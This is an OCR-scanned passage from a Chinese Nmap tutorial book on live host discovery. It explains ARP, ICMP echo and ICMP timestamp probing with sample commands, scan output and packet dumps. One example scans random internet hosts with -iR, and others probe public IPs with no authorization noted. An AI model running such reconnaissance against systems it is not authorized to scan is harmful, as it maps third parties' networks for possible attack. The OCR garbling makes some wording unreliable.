Nmap 中 还 提供 了 一 个 非常 有 意思 的 功能 ， 那 就 是 随机 产生 一 些 目标 ， 然 后 Nmap 会 对 


这 些 目标 进行 扫描 。 


命令 语法 : Nmap -iR [ 目标 的 数量 ] 
下 面 随机 地 在 互联 网 上 对 3 个 IP 地 址 进行 扫描 ， 使 用 的 命令 如 下 。 
Nmap -sn -iR 3 


扫描 的 结果 如 下 。 


Starting Nmap 


7.12 ( https://Nmap.org ) at 2016-09-14 14:35 


Nmap scan report for softbank219036207070.bbtec.net (219.36.207.70) 


Host is up (0. 


12s latency). 


Nmap done: 3 IP addresses (1 host up) scanned in 4.40 seconds 


小 结 





KEIN 


和 作为 开始 ， 详 细 介 绍 了 Nmap 的 强大 功能 ， 也 简单 介绍 了 Nmap 的 基本 


用 法 。 在 本 章 的 结束 时 ， 你 应 该 已 经 掌握 了 如 何 下 载 和 安装 Nmap, HA Nmap 扫描 结果 的 
含义 以 及 基本 的 操作 ， 如 何 使 用 Nmap 对 指定 范围 内 的 主机 进行 扫描 等 。 下 一 章 将 开始 介绍 


Nmap 中 的 第 一 个 功 


能 : 如 何 远 程 检测 一 台 主 机 是 否 处 于 活跃 状态 ， 以 及 检测 原理 。 
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“这 个 世界 是 否 存在 一 台 绝对 安全 的 主机 ， 它 绝对 不 会 受到 来 自 网 络 上 的 攻击 ?” 

这 个 问题 的 答案 是 肯定 的 ， 而 且 其 实 这 种 主机 在 日 常生 活 中 很 常见 ， 打 造 这 样 一 台 安 
全 主机 的 方法 就 是 “ 拔 掉 主机 的 网 线 "， 如 果 党 得 还 不 够 安全 ， 那 么 最 好 将 系统 电源 也 切断 。 
不 过 这 样 做， 这 个 系统 实际 上 也 没有 任何 用 处 了 。 在 现实 生活 中 ， 如 果 一 台 主 机 是 这 种 “ 绝 
对 安全 ”的 状态 ， 那 么 也 就 不 可 能 再 对 其 进行 任何 扫描 了 ， 我 们 关心 的 是 那些 已 经 于 运行 状 
态 并 且 网 络 功能 正常 的 主机 ， 通 常 这 些 主机 又 被 称 为 活跃 主机 。 本 章 的 工作 就 是 想 办 法 来 判 
断 一 台 主 机 是 否 是 活跃 主机 。 

本 章 将 介绍 以 下 内 容 。 

口 网 络 协议 与 活跃 主机 发 现 技术 。 

O 基于 ARP 协议 的 活跃 主机 发 现 技术 。 

O 基于 ICMP 协议 的 活跃 主机 发 现 技术 。 

口 基于 TCP 协议 的 活跃 主机 发 现 技术 。 

O 基于 UDP 协议 的 活跃 主机 发 现 技 术 。 

O 基于 SCTP 协议 的 活跃 主 机 发 现 技术 。 

口 Nmap 活跃 主机 发 现 中 与 DNS 协议 相关 的 选项 。 
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2.1 ”活跃 主机 发 现 技术 简介 


如 何 知道 一 台 主 机 是 不 是 活跃 主机 呢 ? 这 就 要 用 到 活跃 主机 发 现 技术 。 先 看 一 个 现实 生 
活 中 很 常见 的 例子 。 
推销 员 在 销售 产品 的 时 候 ， 经 常 选择 上 门 销售 的 方式 。 他 们 的 做 法 是 首先 敲 门 ， 如 果 房 
子 的 主人 在 家 ， 通 常 就 会 隔 着 门 问 “ 谁 啊 "， 当 然 也 有 些 人 会 直接 打开 门 ， 这 时 销售 员 就 知 
道 了 这 间 房 子 现在 是 有 人 的 ， 而 屋子 里 的 人 很 可 能 就 是 他 的 下 一 个 客户 。 

请 注意 这 个 过 程 中 很 关键 的 一 点 ， 那 就 是 在 生活 中 有 这 样 一 个 默认 的 约定 ， 当 听 到 有 人 
敲 门 的 时 候 ， 屋 子 里 的 人 会 做 出 相应 的 回应 ， 可 能 会 询问 ， 也 可 能 会 开门 。 有 些 时 候 一 些 居 
心 不 良 的 人 就 利用 了 这 一 点 进行 所 谓 的 “踩点 ”。 

了 解 这 个 例子 以 后 ， 就 可 以 很 简单 地 讲述 活跃 主机 发 现 技术 了 。 如 果 想 知道 网 络 中 的 某 
台 主 机 是 否 处 于 活跃 状态 ， 同 样 可 以 采用 这 种 “项 门 ”的 方式 ， 只 不 过 需要 使 用 发 送 数 据 包 
的 形式 来 代替 现实 生活 中 的 “ 敲 门 ”动作 ， 也 就 是 说 活跃 主机 发 现 技术 其 实 就 是 向 目标 计算 
机 发 送 数据 包 ， 如 果 对 方 主机 收 到 了 这 些 数据 包 ， 并 给 出 了 回应 ， 就 可 以 判断 这 台 主 机 是 活 
路 主机。 如 图 2-1 所 示 ，PC0 就 在 向 PC1 发 送 数据 包 。 














PC-PI PC-PT 
PCO PCI 
图 2-1 主机 PC0 向 主机 PC1 发 送 数据 包 
接 下 来 有 两 个 很 关键 的 问题 : 


口 要 向 目标 主机 发 送 什么 数据 包 呢 ? 
O 为 什么 对 方 主机 收 到 了 这 个 数据 包 ， 就 要 给 出 回应 呢 ? 





2.2 网络 协议 与 主机 发 现 技术 


如 今 互 联网 结构 极其 复杂 ， 各 种 不 同 硬件 架构 ， 运 行 着 各 种 不 同 操作 系统 的 设备 却 令 人 惊 
讶 地 连接 在 一 起 。 这 一 切 都 能 正常 运行 要 归功 于 网 络 协议 。 网 络 协议 通常 是 按照 不 同 层次 开发 
出 来 的 ， 每 个 不 同 层次 的 协议 负责 的 通信 功能 也 各 不 相同 。 这 些 协 议 是 为 计算 机 网 络 中 进行 数 
据 交换 而 建立 的 规则 、 标 准 或 约定 的 集合 ， 它 们 “各 尽 其 能 ， 各 司 其 职 " 。 目 前 分 层 模型 有 OSI 
和 TCP/IP 两 种 。 本 书 中 涉及 的 模型 都 采用 了 TCP/IP 分 层 结构 ， 因 为 这 个 结构 更 简洁 实用 。 

TCP/IP 协议 包括 的 层 如 图 2-2 所 示 ， 从 下 到 上 依次 为 网 络 接口 层 、 网 络 层 、 传 输 层 、 应 
用 层 。 
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图 2-2 TCP/IP 分 层 协议 


网 络 接口 层 的 功能 是 接收 TP 数据 包 ， 并 负责 把 这 些 数据 包 送 至 目标 网 络 。 

网 络 层 的 功能 为 实现 网 络 之 间 的 互 连 ， 根 据 数据 包 的 IP 地 址 将 数据 包 从 一 个 网 络 通 
过 路 由 器 传 到 另 一 网 络 。 人 所 熟知 的 ARP 协议 、IP 协议 、ICMP 协议 、IGMP 协议 都 在 这 
一 层 。 

传输 层 的 协议 目前 比较 少 ， 主 要 是 TCP 和 UDP 两 个 ， 功 能 是 为 通信 双方 的 主机 提供 端 
到 端的 服务 。 

应 用 层 的 功能 为 针对 客户 发 出 的 请 求 ， 服 务 器 做 出 响应 并 提供 相应 的 服务 。 例 如 ， 平 
时 最 为 常见 的 HTTP 协议 、FTP 协议 、SMTP 协议 等 都 处 在 这 一 层 ， 应 用 层 的 协议 数量 是 最 
多 的 。 

这 些 协议 与 2.1 节 中 讲 的 例子 又 有 什么 关系 呢 ? 你 还 记得 为 什么 有 人 殴 门 ， 屋 里 的 人 就 
会 有 回应 吗 ?” 对 ， 因 为 这 是 生活 中 一 个 默认 的 约定 。 而 现在 讲述 的 协议 恰恰 就 如 同 这 个 约定 
一 样 ， 这 些 协 议 中 明确 规定 了 如 果 一 台 计 算 机 收 到 来 自 另 一 台 计 算 机 的 特定 格式 数据 包 后 应 
该 如 何 处 理 。 比 如 ， 这 里 有 一 个 TEST 协议 (这 个 协议 目前 并 不 存在 ， 这 里 只 是 为 了 举例 方 
便 , 假设 A 主机 和 B 主机 都 遵守 这 个 协议 )， 它 规定 了 如 果 一 台 主 机 A 收 到 来 自 于 主机 B. 的 
格式 为 “请 求 ” 的 数据 包 ， 那 么 它 必须 在 一 定时 间 内 向 主机 B 再 发 送 一 个 格式 为 “回应 ”的 
数据 包 (实际 上 这 个 过 程 在 很 多 真实 的 网 络 协议 中 都 存在 )。 

那么 ， 如 果 现 在 想 知道 主机 A 是 否 为 活跃 主机 的 话 ， 该 怎么 办 ? 只 需要 在 你 的 主机 上 构 
造 一 个 “请 求 ”"， 然 后 将 它 发 送 给 主机 B。 如 果 主 机 B 是 活跃 主机 ， 那 么 就 会 收 到 来 自 它 的 
“回应 ”数据 包 ， 否 则 的 话 ， 就 会 什么 都 收 不 到 。 

实际 操作 中 ， 可 以 利用 哪些 真实 的 协议 ， 又 有 哪些 协议 做 出 了 如 同 前 面 所 述 的 规定 
呢 ? 最 好 的 方法 就 是 去 阅读 Request For Comments (RFC) 文档 ， 所 有 的 协议 规范 都 可 以 参 
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考 这 个 文档 ， 这 是 一 系列 以 编号 排 定 的 文件 。 基 本 的 互联 网 通信 协议 在 RFC 文件 内 都 有 讨 
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E 





细 说 明 。 


接 下 来 介绍 Nmap 的 第 一 个 参数 -sn (之 前 的 版 本 中 是 -sP， 现 在 采用 了 -sn 的 写法 )。 这 


个 参数 在 这 一 章 中 很 重要 ， 因 为 Nmap 在 扫描 时 ， 默 认 会 将 目标 例如 端口 之 类 的 信息 也 扫描 
出 来 ,但 是 如 果 只 是 想 要 知道 目标 是 否 为 活跃 主机 ， 则 并 不 需要 这 些 信息 ， 反 倒 会 浪费 大 量 
的 时 间 ， 这 里 就 可 以 使 用 这 个 参数 来 指定 不 对 目标 的 端口 和 其 他 信息 进行 扫描 。 








命令 语法 : Nmap -sn [目标 ] 
例如 ， 对 192.168.0.1 进行 扫描 ， 可 以 执行 下 面 的 命令 。 
Nmap 192.168.0.1 


扫描 完成 后 ，Nmap 默认 显示 如 下 的 信息 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 11:36 
Nmap scan report for 192.168.0.1 

Host is up (0.040s latency). 

Not shown: 997 closed ports 


PORT STATE SERVICE 
23/tcp open telnet 
80/tcp open http 


5431/tcp open park-agent 
MAC Address: D8:FE:E3:B3:87:A9 (D-Link International) 
Nmap done: 1 IP address (1 host up) scanned in 4.01 seconds 


而 如 果 使 用 -sn 参数 ， 则 只 会 显示 是 否 为 活跃 主机 这 一 条 ， 在 Nmap 中 执行 如 下 命令 。 
Nmap -sn 192.168.0.1 


扫描 完成 后 ，Nmap 默认 显示 如 下 信息 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 11:39 

Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency).MAC Address: D8:FE:E3:B3:87:A9 (D-Link International) 
Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds 


下 面 就 已 经 被 广泛 用 来 进行 主机 发 现 的 协议 进行 讲解 。 














2.3 基于 ARP 协议 的 活跃 主机 发 现 技术 


2.3.1 ARP 协议 解析 


ARP 协议 位 于 TCP/IP 协议 族 中 的 网 络 层 ， 这 个 协议 的 目的 主要 是 解决 逻辑 地 址 和 物理 


地 址 的 转换 关系 。 网 络 上 的 通信 要 使 用 到 两 个 地 址 : 物理 地 址 和 逻辑 地 址 。 同 一 网 段 中 的 通 
售 一 般 使 用 物理 地 址 ， 不 同 网 段 之 间 的 通信 一 般 使 用 逻辑 地 址 。 这 一 点 可 能 你 已 经 知道 了 ， 
但 是 为 什么 要 这 样 做 呢 ? 只 有 一 个 地 址 不 是 会 更 简单 一 些 吗 ? 
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还 是 先 来 看 现实 生活 中 的 一 个 例子 。 一 个 小 男孩 想 送 给 远 在 另 一 个 城市 的 好 朋友 一 份 礼 
物 ， 那 么 他 所 需要 做 的 就 是 将 礼物 包装 好 ， 将 好 朋友 家 的 地 址 写 在 包装 袋 上 ， 然 后 将 包装 袋 
交 给 快递 ， 接 下 来 快递 公司 就 会 将 这 份 礼物 送 到 好 朋友 的 家 中 。 

如 果 这 个 小 男孩 还 想 送 给 住 在 一 起 的 妈妈 一 份 礼物 呢 ? 他 怎么 做 ， 还 要 交 给 快递 员 
吗 ? 显然 这 样 太 麻烦 了 ， 他 只 需要 拿 着 这 份 礼 物 ， 走 进 妈妈 的 房间 ， 然 后 将 礼物 放下 就 
HT. 
可 以 将 这 里 面 的 小 男孩 和 他 的 好 朋友 理解 为 处 在 不 同 网 段 的 两 台 主 机 ， 而 小 男孩 和 生活 
在 一 起 的 妈妈 就 像 同 一 网 段 的 两 台 主 机 。 世 界 上 所 有 的 网 络 都 可 以 按照 这 个 方式 进行 分 割 ， 
和 你 处 在 同一 网 段 的 主机 是 一 部 分 ， 和 你 处 在 不 同 网 段 的 主机 是 另 一 部 分 。 

如 果 按 照 上 面 介 绍 的 例子 ,那么 是 不 是 在 设计 软件 的 时 候 ， 就 要 同时 考虑 两 种 情况 ， 在 
和 不 同 网 段 通信 的 时 候 ， 使 用 逻辑 地 址 ， 和 否则 使 用 物理 地 址 呢 ? 结果 显然 并 非 如 此 ， 在 设计 
各 种 应 用 的 时 候 ， 仅 仅 使 用 了 逮 辑 地 址 就 可 以 完成 所 有 的 任务 。 那 么 处 于 同一 网 段 的 通信 又 
是 如 何 完成 的 呢 ? 

在 同一 网 段 中 ， 所 有 的 主机 都 会 连接 到 一 个 叫 作 交换 机 (曾经 是 集线器 ， 现 在 已 经 很 少 
HT) 的 设备 上 ， 交 换 机 上 有 很 多 接口 ， 每 个 接口 与 一 个 主机 通过 网 线 相连 。 交 换 机 中 有 一 
个 内 容 寻 址 寄存 器 ， 这 个 寄存 器 中 存储 了 每 个 接口 所 连接 的 主机 的 物理 地 址 表 。 它 会 使 用 这 
张 表 来 确定 应 该 向 哪 一 个 接口 发 送 数据 包 。 但 是 如 果 目 标的 物理 地 址 是 未 知 的 话 ， 这 个 地 址 
就 需要 通过 额外 的 通信 进行 解析 了 。 

例如 ， 一 台 逮 辑 地 址 为 192.168.0.1 的 主机 A 想 与 逻辑 地 址 为 192.168.0.2 的 主机 B 进行 
通信 ， 但 是 主机 A 又 不 知道 主机 B 的 物理 地 址 ， 这 时 就 需要 一 个 可 以 将 逻辑 地 址 解析 为 物理 
地 址 的 协议 ， 这 个 协议 名 为 地 址 解析 协议 (ARP)， 它 在 RFC826 中 进行 了 定义 。 

在 上 面 例子 的 情景 中 ， 按 照 ARP 的 规定 ， 主 机 A 就 会 发 出 一 个 ARP 请 求 ， 内 容 大 概 
就 是 “注意 了 ,我 的 逻辑 地 址 是 192.168.0.1， 我 的 物理 地 址 是 22:22:22:22:22:22， 人 逻辑 地 
址 为 192.168.0.2 的 主机 在 吗 ? 我 需要 和 你 进行 通信 ， 请 告诉 我 你 的 物理 地 址 ， 收 到 请 回 
答 1”"， 这 个 数据 包 是 以 广播 的 形式 发 送 给 网 段 中 所 有 设备 的 ， 不 过 只 有 主机 B 会 给 出 回 
应 ,他 的 回应 包 大 概 就 是 “ 畴 ， 我 就 是 那个 逻辑 地 址 为 192.168.0.2 的 主机 ， 我 的 物理 地 址 是 
33:33:33:33:33:33”。 主 机 A 在 收 到 这 个 数据 包 之 后 ， 就 知道 了 主机 B 的 物理 地 址 。 完 成 这 
个 过 程 后， 主机 A 和 主机 B 就 可 以 开始 通信 了 。 

好 了 ， 你 有 没有 发 现 ARP 和 我 们 之 前 虚拟 的 TEST 协议 有 什么 相同 之 处 呢 ? 按照 ARP 
规定 ， 当 主机 B 收 到 来 自主 机 A 的 ARP 请 求 的 时 候 ， 主 机 了 就 应 当 向 主机 A 发 回 一 个 回 
应 。 那 么 好 了 ， 实 际 上 我 们 的 第 一 个 活跃 主机 发 现 技术 已 经 产生 了 。 

基于 ARP 协议 的 活跃 主机 发 现 技术 的 原理 是 : 如 果 想 要 知道 处 在 同一 网 段 的 IP 地 址 为 
*.*.** 的 主机 是 否 为 活跃 主机 ， 只 需要 构造 一 个 ARP 请 求 数据 包 ， 并 广播 出 去 ， 如 果 得 到 
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了 回应 ， 则 说 明 该 主机 为 活跃 主机 。 

这 种 发 现 技术 的 优点 在 于 准确 度 高 ， 任 何 处 于 同一 网 段 的 设备 都 没有 办 法 防御 这 种 技术 ， 
为 如 果 不 遵守 ARP， 那 么 将 意味 着 无 法 通信 。 缺 点 在 于 这 种 发 现 技术 不 能 对 处 于 不 同 网 段 的 
目标 主机 进行 扫描 。 好 的 ， 接 下 来 看 看 Nmap 是 如 何 利 用 这 种 技术 实现 活跃 主机 发 现 的 。 














2.3.2 在 Nmap 中 使 用 ARP 协议 进行 主机 发 现 

当 目 标 主 机 与 我 们 处 于 同一 网 段 的 时 候 ， 使 用 ARP 协议 扫描 技术 就 是 最 佳 的 选择 。 
不 仅 速度 最 快 ， 扫 描 结果 也 是 最 为 精准 的 。 这 是 因为 没有 任何 安全 措施 会 阻止 正常 的 ARP 
请 求 。 

使 用 Nmap 的 选项 -PR 就 可 以 实现 ARP 协议 的 主机 发 现 。 

命令 语法 : Nmap -PR [目标 ] 

例如 对 192.168.1.1 利用 ARP 协议 进行 一 次 扫描 , 执行 如 下 的 代码 。 

Nmap -sn -PR 192.168.1.1 


得 到 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-08-13 11:29 

Nmap scan report for 192.168.0.1 

Host is up (0.0030s latency). [n) 
MAC Address: D8:FE:E3:B3:87:A9 (D-Link International). Q 
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds 


上 例 中 对 IP Hh 79 192.168.1.1 的 设备 是 否 为 活跃 主机 进行 了 检测 ， 从 结果 中 可 以 看 
到 ，@ 中 中 的 “Host is up” 这 说 明 设 备 为 活跃 主机 ， 而 @ 中 给 出 了 192.168.1.1 设备 的 物理 地 
址 (D8:FE:E3:B3:87:A9 )。 
这 种 技术 的 工作 原理 其 实 非 常 简单 ， 只 需要 两 个 步骤 。 
步骤 1: 将 一 个 内 容 为 “who-has 192.168.0.1 tell 192.168.0.4” 的 ARP 请 求 ( 详 细 内 容 如 
下 ) 发 送 给 目标 。 
Frame 3221: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: Broadcast 
(ff:ff:ff:iff:ffiff) 
Destination: Broadcast (ff:ff:ff:ff:ff:ff) 
Source: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30) 
Type: ARP (0x0806) ®© 
Address Resolution Protocol (request) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (0x0800) 
Hardware size: 6 
Protocol size: 4 
Opcode: request (1) Q 
Sender MAC address: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30) 
Sender IP address: 192.168.0.4 
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Target MAC address: 00:00:00 00:00:00 (00:00:00:00:00:00) 
Target IP address: 192.168.0.1 


上 面 给 出 了 这 个 ARP 请 求 数据 包 的 完整 格式 。 通 过 以 太 网 帧 头 (Ethernet ID). 的 
Destination 字段 可 以 看 出 ， 这 是 一 个 广播 数据 包 ， 这 个 数据 包 的 源 地 址 Source 字 段 为 
08:10:76:6a:ad:30。 目 的 地 址 Destination 为 华人: 任 任 : 任 企 ,这 是 一 个 广播 地 址 ， 整 个 网 段 中 的 
全 部 主机 都 会 接收 到 这 个 ARP 请 求 数据 包 。 

在 Address Resolution Protocol? 4r, (Dh H9 “ Type: ARP (0x0806)” 表 示 这 是 一 
个 ARP 数 据 包 ，@@ 中 的 “Opcode: request (1)” 表 示 这 是 一 个 请 求 类 型 的 数据 包 。 这 个 
包头 中 列 出 了 扫描 方 的 逻辑 地 址 “ Sender IP address: 192.168.0.4” 和 物理 地 址 “ Sender 
MAC address: 08:10:76:6a:ad:30"， 以 及 被 扫描 方 的 逻辑 地 址 192.168.0.1, 但 是 此 时 被 
扫描 方 的 MAC 地 址 还 是 未 知 的 ， 所 以 这 里 的 目的 地 址 字段 为 “Target MAC address: 
00:00:00_00:00:00"。 

步骤 2: 如 果 目 标 主机 给 出 了 一 个 相应 的 ARP 回 应 “ARP reply 192.168.0.1 is-at 
D8:FE:E3:B3:87:A9” (详细 内 容 如 下 ) 的 话 ， 那 么 说 明 它 是 活跃 主机 。 


Frame 3222: 42 bytes on wire (336 bits)，42 bytes captured (336 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
(08:10:76:6a:ad:30) 
Destination: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30) 
Source: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9) 
Type: ARP (0x0806) [ni 
Address Resolution Protocol (reply) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (0x0800) 
Hardware size: 6 
Protocol size: 4 
Opcode: reply (2) Q 
Sender MAC address: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9) 
Sender IP address: 192.168.0.1 
Target MAC address: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30) 
Target IP address: 192.168.0.4 


在 这 个 ARP 响应 数据 包 中 ， 以 太 网 帧 头 (Ethernet II) 的 Destination 部 分 的 值 就 是 之 前 
ARP 请 求 数据 包 中 的 Source 地 址 。 这 两 个 数据 包 的 格式 是 一 样 的 。 

在 Address Resolution Protocol 部 分 ， 四 中 的 “ Type: ARP (0x0806)” 表 示 这 是 一 个 ARP 
数据 包 ，@) 中 的 Opcode 字段 的 值 为 reply (2)， 可 以 看 到 这 是 一 个 ARP 响应 包 ， 原 来 ARP 请 
求 包 中 的 发 送 方 的 物理 地 址 和 逻辑 地 址 现在 变 成 了 这 个 ARP 响应 包 中 目的 的 物理 地 址 和 逮 
辑 地 址 ， 也 就 是 说 ARP 请 求 包 和 ARP 响应 包 中 的 地 址 信息 是 颠倒 的 。 

如 果 在 发 出 了 AR 请 求 数据 包 之 后 ， 却 迟 迟 得 不 到 ARP 响应 数据 包 的 话 ， 就 可 以 认为 
该 他 地 址 所 在 的 设备 不 是 活跃 主机 。 
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2.4 ”基于 ICMP 协议 的 活跃 主机 发 现 技术 


2.4.1 ICMP 协议 解析 

ICMP 协议 也 位 于 TCP/IP 协议 族 中 的 网 络 层 ,， 它 的 目的 是 在 人 P 主机 、 路 由 器 之 间 传 递 
控制 消息 。 没 有 任何 系统 是 完美 的 ， 互 联网 也 一 样 。 互 联网 也 经 常会 出 现 各 种 错误 ， 为 了 发 
现 和 处 理 这 些 错 误 ，ICMP ( Internet Control Message Protocol， 互 联网 控制 报 文 协议 ) 应 运 
而 生 。 同 样 这 种 协议 也 可 以 用 来 实现 活跃 主机 发 现 。 有 了 之 前 ARP 主机 发 现 技术 的 经 验 之 
后 ， 再 来 了 解 一 下 ICMP 协议 是 如 何 进行 活跃 主机 发 现 的 。 相 比 起 ARP 简单 明了 的 工作 模 
式 ，ICMP 则 要 复杂 很 多 ， 但 ICMP 同样 是 互联 网 中 不 可 或 缺 的 协议 。 表 2-1 中 给 出 了 ICMP 
报 文 的 种 类 。 














32-1 ICMP 报 文 的 种 类 


ICMP 报 文 的 类 型 
终点 不 可 到 达 
源 抑 制 
超时 
参数 失灵 
重 定向 
响应 请 求 或 应 答 
时 间 惟 请求 或 应 答 
地 址 掩 码 请 求 或 应 答 
路 由 器 询问 或 通告 


从 表 2-1 可 以 看 出 ，ICMP 的 报 文 可 以 分 成 两 类 : 差错 和 查询 。 查 询 报 文 是 用 一 对 请 求 
和 应 答 定义 的 。 也 就 是 说 ， 主 机 A 为 了 获得 一 些 信 息 ， 可 以 向 主机 B 发 送 ICMP 数据 包 ， 主 
机 B 在 收 到 这 个 数据 包 之 后 ， 会 给 出 应 答 。 这 一 点 正好 符合 我 们 进行 活跃 主机 扫描 的 要 求 。 
所 以 这 里 的 ICMP 活跃 主机 发 现 技术 使 用 的 就 是 查询 报 文 。 

ICMP 中 适合 使 用 的 查询 报 文 包括 如 下 3 类 。 


1. 响应 请 求 和 应 答 

用 来 测试 发 送 与 接收 两 端 链 路 及 目标 主机 TCP/IP 协议 是 否 正常 ， 只 要 收 到 就 是 正常 。 
我 们 日 常 使 用 最 多 的 是 ping 命令 ， 利 用 响应 请 求 和 应 答 ， 主 机 A 向 一 个 主机 B 发 送 一 个 
ICMP 报 文 ， 如 果 途 中 没有 异常 (例如 被 路 由 器 丢弃 、 目 标 不 回应 ICMP 或 传输 失败 )， 则 主 
机 B 返回 ICMP 报 文 , 说明 主 机 B 处 于 活跃 主机 。 


2. 时 间 惟 请求 和 应 答 
ICMP 时 间 戳 请 求 允 许 系统 向 另 一 个 系统 查询 当前 的 时 间 。 返 回 的 建议 值 是 自 午夜 


ICMP 报 文 种 类 


差错 报告 报 文 


查询 报 文 
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始 计算 的 毫秒 数 ， 即 协调 世界 时 (Coordinated Universal Time, UTC) (早期 的 参考 手册 认为 
UTC 是 格林 尼 治 时 间 )。 如 果 想 知道 B 主机 是 否 在 线 ， 还 可 以 向 B 主机 发 送 一 个 ICMP 时 间 
惟 请 求 ， 如 果 得 到 应 答 的 话 就 可 以 视 为 B 主机 在 线 。 当 然 ， 其 实数 据 包 内 容 并 不 重要 ， 重 要 
的 是 是 否 收 到 了 回应 。 


3. 地 址 掩 码 请 求 和 应 答 

ICMP 地 址 掩 码 请 求 由 源 主机 发 送 ， 用 于 无 盘 系 统 在 引导 过 程 中 获取 自己 的 子 网 掩 码 。 这 
里 很 多 人 可 能 会 觉得 我 们 的 系统 大 多 数 时 候 都 不 是 无 盘 系 统 ， 是 不 是 这 个 技术 就 没有 用 了 呢 ? 

虽然 RFC 规定 ， 除 非 系统 是 地 址 掩 码 的 授权 代理 ， 否 则 它 不 能 发 送 地 址 掩 码 应 答 (为 了 
成 为 授权 代理 ， 它 必须 进行 特殊 配置 ， 以 发 送 这 些 应 答 )。 但 是 ， 大 多 数 主机 在 收 到 请 求 时 
都 发 送 一 个 应 答 。 如 果 想 知道 B 主机 是 否 在 线 ， 还 可 以 向 B 主机 发 送 一 个 ICMP 掩 码 地 址 请 
求 ， 如 果 得 到 应 答 的 话 就 可 以 视 为 B 主机 在 线 。 

在 ICMP 主机 发 现 技术 中 ， 可 以 利用 的 就 是 上 述 3 种 查询 报 文 。 














2.4.2 使 用 ICMP 协议 进行 主机 发 现 
这 里 的 ICMP 协议 可 以 使 用 3 种 类 型 的 查询 报 文 来 进行 主机 发 现 的 任务 ， 下 面 分 别 进行 介绍 。 


1. 通过 ICMP 响应 请 求 和 应 答 进 行 主机 发 现 

发 送 ICMP 响应 请 求 ， 如 果 得 到 目标 主机 发 回 的 ICMP 响应 ， 则 说 明 该 主机 处 于 活跃 状 
态 。 这 个 查询 报 文 可 以 通过 最 常 使 用 的 ping 命令 来 发 送 。 很 多 人 都 有 过 这 样 的 经 历 ， 在 检 
查 网 络 中 的 某 个 设备 是 否 在 线 的 时 候 ， 经 常会 通过 在 命令 行 中 输入 ping < 目标 人 P 地 址 > 的 
方式 来 查看 目标 是 否 在 线 。 读 到 这 里 ， 有 些 人 可 能 会 有 这 样 一 个 疑惑 ， 既 然 有 了 这 么 高 效 的 
ping 工具 ， 为 什么 还 要 去 研究 这 么 多 主机 在 线 发 现 技术 呢 ? 

这 主要 是 由 于 ping 工具 在 过 去 被 滥用 了 ， 因 此 很 多 用 于 防护 主机 的 防火 墙 设备 都 隔绝 
ICMP 数据 包 通 过 。 这 样 就 造成 了 明明 可 以 和 一 台 设 备 通信 ， 但 是 ping 的 结果 却 始终 显示 为 
得 不 到 响应 。 

使 用 Nmap 的 选项 -PE 就 可 以 实现 ICMP 协议 的 主机 发 现 。 这 个 过 程 实质 上 和 ping 是 一 样 的 。 

命令 语法 : Nmap -PE[ 目标 ] 

执行 如 下 命令 。 

Nmap -sn -PE 60.2.22.35 

执行 的 结果 如 下 。 

Starting Nmap 7.12 ( https://Nmap.org ) at 2016-08-14 21:34 

Nmap scan report for 60.2.22.35 


Host is up (0.13s latency). 
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds 
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这 个 过 程 很 简单 ， 以 发 送 和 接收 到 的 数据 包 来 查看 一 下 。 这 个 过 程 是 Nmap 


(192.168.0.4 ) 向 目标 ( 60.2.22.35 ) 发 送 了 一 个 ICMP echo 请 求 的 数据 包 ， 注 意 结果 中 Type 
字段 的 值 为 8。 


Frame 35: 42 bytes on wire (336 bits)，42 bytes captured (336 bits) on interface 0 
Ethernet II, Src: 08:10:76:6a:ad:30 (08:10:76:6a:ad:30), Dst: D-LinkIn b3:87:a9 
(d8:fe:e3:b3:87:a9) 
Internet Protocol Version 4, Src: 192.168.0.4, Dst: 60.2.22.35 
Internet Control Message Protocol 
Type: 8 (Echo (ping) request) 

Code: 0 

Checksum: 0xlda6 [correct] 

Identifier (BE): 55897 (0xda59) 

Identifier (LE): 23002 (0x59da) 

Sequence number (BE): 0 (0x0000) 

Sequence number (LE): 0 (0x0000) 

[RespoNSE frame: 36] 


如 果 对 方 主机 在 线 ， 而 且 没 有 防火 墙 隔离 通信 ， 将 会 收 到 目标 主机 发 回 的 如 下 格式 的 








ICMP echo 响应 数据 包 ， 注 意 其 中 的 Type 字段 的 值 为 0。 


Frame 36: 42 bytes on wire (336 bits)，42 bytes captured (336 bits) on interface 0 
Ethernet II, Src: D-LinkIn b3:87:a9 (d8:fe:e3:b3:87:a9), Dst: 08:10:76:6a:ad:30 
(08:10:76:6a:ad:30) 
Internet Protocol Version 4, Src: 60.2.22.35, Dst: 192.168.0.4 
Internet Control Message Protocol 
Type: 0 (Echo (ping) reply) 
Code: 0 
Checksum: 0x25a6 [correct] 
Identifier (BE): 55897 (0xda59) 
Identifier (LE): 23002 (0x59da) 
Sequence number (BE): 0 (0x0000) 
Sequence number (LE): 0 (0x0000) 
[Request frame: 35] 
[RespoNSE time: 125.571 ms] 


2. 通过 ICMP 时 间 戳 请 求 和 应 答 进行 主机 发 现 
可 惜 的 是 ， 前 面 介绍 的 ping 方式 已 经 被 很 多 网 络 所 禁止 ， 因 此 必须 另 更 它 法 。 比 如 利用 


之 前 提 到 过 的 时 间 戳 。 


使 用 Nmap 的 选项 -PP 就 可 以 实现 ICMP 协议 的 时 间 戳 主机 发 现 。 
命令 语法 : Nmap -PP[ 目标 ] 

执行 如 下 命令 。 

Nmap -sn -PP 60.2.22.35 


执行 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-08-14 22:15 
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Nmap scan report for 60.2.22.35 
Host is up (0.13s latency). 
